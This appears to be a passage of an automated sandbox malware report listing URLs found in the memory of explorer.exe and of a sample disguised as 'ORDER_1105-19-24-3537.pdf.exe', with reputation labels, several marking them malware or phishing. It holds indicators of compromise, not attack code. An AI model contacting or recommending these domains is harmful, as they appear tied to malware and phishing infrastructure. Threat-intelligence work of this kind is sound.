http://www.bdkasinoxox.xyzReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.beauty.university	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abandoned-houses-39863.bondReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.longmaosol.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.bigbrown999.site/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.laske.xyz/rn94/www.run-run.tokyo	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.beauty.university/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.laske.xyzReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.practicalfranchises.info/rn94/www.yzh478c.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.beauty.universityReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hinet.tech/rn94/www.beauty.university	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qwechaotk.top	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.bdkasinoxox.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nicoleb.tech	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.010101-11122-2222.cloud/rn94/www.longmaosol.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.bigbrown999.site	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ln2m1.shop/rn94/www.practicalfranchises.info	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ln2m1.shop/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000006.00000000.2118388010.000000000C549000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4549228460.000000000C549000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nicoleb.tech/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.yzh478c.xyzReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.beauty.university/rn94/www.nicoleb.tech	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2126422712.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hinet.tech/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.010101-11122-2222.cloudReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ln2m1.shopReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nicoleb.tech/rn94/www.laske.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.010101-11122-2222.cloud	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.day2go.net	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.laske.xyz/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.run-run.tokyo/rn94/www.010101-11122-2222.cloud	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.run-run.tokyo/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.qwechaotk.topReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.run-run.tokyoReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abandoned-houses-39863.bond/rn94/www.bigbrown999.site	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.day2go.netReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.day2go.net/rn94/www.resdai.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.longmaosol.xyzReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yzh478c.xyz/rn94/www.hinet.tech	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.com	explorer.exe, 00000006.00000003.3095307334.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4546983182.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875425211.0000000009C92000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nicoleb.techReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.resdai.xyz/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abandoned-houses-39863.bond	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ln2m1.shop	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.day2go.net/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qwechaotk.top/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.resdai.xyz/rn94/www.qwechaotk.top	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000006.00000000.2109047338.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4543330536.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875781902.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bdkasinoxox.xyz/rn94/www.day2go.net	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.010101-11122-2222.cloud/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.yzh478c.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.practicalfranchises.info	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000006.00000002.4545985269.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
